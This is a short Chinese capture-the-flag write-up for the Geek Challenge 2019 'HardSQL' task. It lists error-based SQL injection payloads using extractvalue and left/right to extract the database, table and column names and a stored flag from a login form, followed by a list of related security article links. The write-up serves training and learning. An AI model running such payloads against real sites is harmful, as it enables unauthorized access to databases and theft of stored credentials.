[极客大挑战 2019]HardSQL1

拿到题目,好多类似的,这次估计更难,sql注入漏洞

随便注入一个

估计是被过滤了

2.1我们先去爆数据库:先构造payload:

复制代码
?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(database()))))%23

爆表名

复制代码
?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))%23

爆列名

复制代码
?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))%23

flag出来了,但是只有一半,使用right和left

复制代码
/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))%23

/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1))))%23

得到flag

相关推荐
roshy7 小时前
可信计算、TPM
安全
Bruce_Liuxiaowei8 小时前
权限维持:操作系统后门技术分析与防护
网络·安全·web安全
wanhengidc9 小时前
云手机通常使用什么架构
服务器·网络·安全·游戏·智能手机·云计算
芯盾时代11 小时前
《网络安全法》完成修改,AI安全正式“入法”
人工智能·安全·web安全
KKKlucifer12 小时前
数据智能时代的安全困局与 AI 破局逻辑
人工智能·安全
华硕广东17 小时前
当电脑开机自动进入 BIOS 更新画面时,不必惊慌~
科技·安全·技术美术
llxxyy卢17 小时前
文件上传之基础过滤方式
安全·web安全
FreeBuf_18 小时前
GlassWorm蠕虫卷土重来:开源安全体系暴露根本性缺陷
安全·开源
CC-NX18 小时前
移动终端安全:实验4-中间人攻击
安全·中间人攻击·安卓逆向工具·burp suite真机抓包
xixixi7777719 小时前
攻击链重构的具体实现思路和分析报告
开发语言·python·安全·工具·攻击链